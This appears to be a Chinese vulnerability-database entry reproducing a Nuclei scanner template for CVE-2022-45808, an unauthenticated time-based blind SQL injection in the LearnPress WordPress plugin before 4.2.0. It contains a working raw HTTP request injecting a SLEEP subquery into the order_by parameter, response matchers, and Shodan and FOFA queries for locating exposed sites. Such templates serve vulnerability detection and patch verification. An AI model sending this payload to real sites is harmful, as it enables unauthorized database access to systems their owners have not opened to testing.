漏洞描述
SQL Injection vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
CVE-2022-45808: LearnPress Plugin < 4.2.0 - Unauthenticated Time-Based Blind SQLi
PoC代码[已公开]
id: CVE-2022-45808
info:
name: LearnPress Plugin < 4.2.0 - Unauthenticated Time-Based Blind SQLi
author: DhiyaneshDK
severity: critical
description: |
SQL Injection vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
reference:
- https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-wordpress-lms-plugin-plugin-4-1-7-3-2-sql-injection?_s_id=cve
- https://github.com/RandomRobbieBF/CVE-2022-45808
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cve-id: CVE-2022-45808
cwe-id: CWE-89
epss-score: 0.74701
epss-percentile: 0.98823
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: thimpress
product: learnpress
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/learnpress"
fofa-query: body="/wp-content/plugins/learnpress"
publicwww-query: /wp-content/plugins/learnpress
tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,sqli,time-based-sqli
http:
- raw:
- |
POST /wp-json/lp/v1/courses/archive-course HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
c_search=X&order_by=ID AND (SELECT 1471 FROM (SELECT(SLEEP(6)))VcSO)&order=DESC&limit=10&return_type=html
matchers:
- type: dsl
dsl:
- 'duration >= 6'
- 'contains_all(body, "status", "message")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100dbb47edd4555b5a01b2db465dd394ee60a913d5267487ac215baac7eb3410c7902207b1cd12a9fe619bd584aaac19ad11679bfd6157b59a157bfd364ce3f0814b167:922c64590222798bb761d5b6d8e72950